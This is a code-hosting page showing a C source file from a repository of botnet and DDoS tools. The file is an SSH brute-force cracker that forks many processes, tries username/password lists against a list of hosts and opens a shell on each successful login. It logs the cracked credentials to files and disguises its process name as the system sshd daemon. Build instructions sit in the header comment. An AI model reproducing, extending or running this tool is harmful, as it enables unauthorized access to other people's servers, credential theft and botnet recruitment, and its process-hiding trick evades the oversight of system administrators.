Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/Botnets/Scanning/SSH/update.c
5038 views
1
/*

2
* cp /usr/local/lib/libssh.so /usr/lib/

3
*

4
* gcc -o update prg.c -I /usr/local/include -L /usr/local/lib/ -lssh -lpthread

5
*

6
* passfile: root root

7
*

8
*/

9
#include <stdio.h>

10
#include <arpa/inet.h>

11
#include <libssh/libssh.h>

12
#include <netinet/in.h>

13
#include <string.h>

14
#include <sys/socket.h>

15
#include <sys/types.h>

16
#include <netdb.h>

17
#define NORM  "\033[00;00m"

18


19
#define ALBASTRU "\033[01;34m"

20
#define FAKE "/usr/sbin/sshd" // fake process

21


22
int flag,where;

23
int shell(SSH_SESSION *session){

24
struct timeval;

25
int err;

26
BUFFER *readbuf=buffer_new();

27
time_t start;

28
CHANNEL *channel;

29
channel = open_session_channel(session,1000,1000);

30
if(isatty(0))

31
  err=channel_request_pty(channel); 

32
err= channel_request_shell(channel);

33
start=time(0);

34
while (channel->open!=0) 

35
  {

36
   usleep(500000);

37
   err=channel_poll(channel,0);

38
   if(err>0){

39
   err=channel_read(channel,readbuf,0,0);

40
    }

41
   else

42
   {

43
    if(start+5<time(0))

44
    {

45
     return 1;

46
    }

47
   }

48
   }

49
   return 0;

50
  }

51


52
void checkauth(char *user,char *password,char *host) {

53
 struct hostent *hp;struct in_addr  *myaddr;

54
 SSH_SESSION *session;

55
 SSH_OPTIONS *options;

56
 int argc=1;

57
 char *argv[]={"none"};

58
 FILE *vulnf,*nolog; 

59
 where++;

60
 alarm(10);

61
 options=ssh_getopt(&argc,argv);

62
 options_set_username(options,user);

63
 options_set_host(options,host);

64
 session=ssh_connect(options);

65
 if(!session) return ;

66
 if(ssh_userauth_password(session,NULL,password) != AUTH_SUCCESS) 

67
 {

68
  ssh_disconnect(session);

69
  return;

70
 }

71
 if(shell(session))

72
 {

73
 if(!flag){

74
  myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));

75
  myaddr->s_addr=inet_addr(host);

76
  hp = gethostbyaddr((char *) myaddr,4,AF_INET);

77
  if((hp!=NULL)){

78
  vulnf=fopen("vuln.txt","a+");

79
  fprintf(vulnf,"%s:%s %s -> %s\n",user,password,host,hp->h_name);

80
  printf("\nCracked -> %s:%s %s -> %s\n",user,password,host,hp->h_name);}

81
  else{

82
  vulnf=fopen("root.txt","a+");

83
  fprintf(vulnf,"%s:%s %s -> Can not solve dns\n",user,password,host);

84
  printf("\nCracked -> %s:%s %s -> Can not solve dns\n",user,password,host);

85
  }

86
//  flag=1;

87
  fclose(vulnf);

88
 }

89
 }

90
 else{ // if ssh login is denied, printf() && log it

91
    myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));

92
    myaddr->s_addr=inet_addr(host);

93
    hp = gethostbyaddr((char *) myaddr,4,AF_INET);

94
   nolog=fopen("nologin.txt","a+");

95
   if((hp!=NULL)){

96
   fprintf(nolog,"%s %s %s -> %s\n",user,password,host,hp->h_name);

97
   printf("\nNologin -> %s %s %s -> %s\n",user,password,host,hp->h_name);}

98
else

99
{

100
 fprintf(nolog,"%s %s %s -> n-are host\n",user,password,host);

101
   printf("\nNologin -> %s %s %s -> n-are host\n",user,password,host);}

102


103
   fclose(nolog);

104
 }

105
}

106
int main(int argc, char **argv)

107
{

108
 FILE *fp,*passf;

109
 char *c;

110
 char buff[4096];

111
 char *a[80196], nutt[4096], *temp, *t, *string;

112
 malloc(sizeof(a));

113
 malloc(sizeof(nutt));

114
 int count = 0, i;

115
 int numforks,maxf;

116
 if((passf=fopen("pass_file","r")) == NULL)

117
  {

118
  printf("\e[1;31mFATAL: I have not found pass_file\n"NORM);

119
  return -1;

120
  }

121
   while (fgets(nutt,2024,passf))

122
      {

123
        while (t = strchr (nutt,'n'))

124
        *t = '.';

125
        temp = strtok (nutt, " ");

126
        string = strdup (temp);

127
        a[count++]=string;

128
         while (temp = strtok (NULL, " "))

129
          {

130
              string = strdup (temp);

131
              a[count++]=string;

132
          }

133


134
             }

135
 fclose(passf);

136
 if(argc!=2)

137
 {

138
  printf("\n\e[1;31m%s <max forks>\n"NORM,argv[0]);

139
  exit(0);

140
 }

141
 if((fp=fopen("mfu.txt","r"))==NULL) exit(printf("\e[1;31mFATAL: I can't open mfu.txt\n"NORM));

142
 printf("\e[1;31mBruteSSH v1.0 \e[00;00m- \e[1;32mBy ur mums fanny\n"NORM);

143
 maxf=atoi(argv[1]);

144


145
strcpy(argv[0],FAKE);    // fake the proccess name.

146
 while(fgets(buff,sizeof(buff),fp))

147
 {

148
  c=strchr(buff,'n');

149
  if(c!=NULL) *c='.';

150
  if (!(fork()))

151
  {

152
  where=0;

153
//   printf("--> Atacare %s",buff);

154
 for (i=0; i<count; i=i+2){

155
//   printf("--> Try %s:%s %s\n",a[i],a[i+1],buff);

156
     checkauth(a[i],a[i+1],buff); // try to auth

157
 }

158
  exit(0);

159
  }

160
  else

161
  {

162
 numforks++;

163
 if (numforks > maxf)

164
 for (numforks; numforks > maxf; numforks--)

165
 wait(NULL);

166
  }

167
 }

168
}

169


170